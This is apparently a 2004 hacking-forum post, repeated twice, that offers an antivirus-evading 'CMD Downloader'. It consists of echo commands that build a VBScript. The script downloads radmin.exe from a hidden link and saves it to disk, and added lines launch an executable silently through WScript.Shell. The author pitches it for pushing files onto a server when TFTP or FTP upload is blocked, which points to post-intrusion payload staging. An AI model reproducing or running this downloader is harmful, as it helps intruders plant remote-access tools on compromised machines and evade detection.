god
05-23-2004, 11:38 AM
This is unknown version of "CMD Downloader" programmed by Teraboot!,It's not detectable by AntiViruses.
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs
echo xPost.Open "GET","[Only registered and activated users can see links]",0 >>webdown.vbs
echo xPost.Send() >>webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs
echo sGet.Mode = 3 >>webdown.vbs
echo sGet.Type = 1 >>webdown.vbs
echo sGet.Open() >>webdown.vbs
echo sGet.Write(xPost.responseBody) >>webdown.vbs
echo sGet.SaveToFile "radmin.exe",2 >>webdown.vbs
cscript webdown.vbs
if you want to execute it after downloading just simply add:
echo Dim WshShell>>c:\madefile.vbs
echo Set WshShell = CreateObject("WScript.Shell")>>c:\madefile.vbs
echo WshShell.Run "c:\eject.exe", 0, false>>c:\madefile.vbs
This is useful for those can't upload a file using TFTP or FTP or ... to a server for any reason.
Regards GoD
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs
echo xPost.Open "GET","[Only registered and activated users can see links]",0 >>webdown.vbs
echo xPost.Send() >>webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs
echo sGet.Mode = 3 >>webdown.vbs
echo sGet.Type = 1 >>webdown.vbs
echo sGet.Open() >>webdown.vbs
echo sGet.Write(xPost.responseBody) >>webdown.vbs
echo sGet.SaveToFile "radmin.exe",2 >>webdown.vbs
cscript webdown.vbs
if you want to execute it after downloading just simply add:
echo Dim WshShell>>c:\madefile.vbs
echo Set WshShell = CreateObject("WScript.Shell")>>c:\madefile.vbs
echo WshShell.Run "c:\eject.exe", 0, false>>c:\madefile.vbs
This is useful for those can't upload a file using TFTP or FTP or ... to a server for any reason.
Regards GoD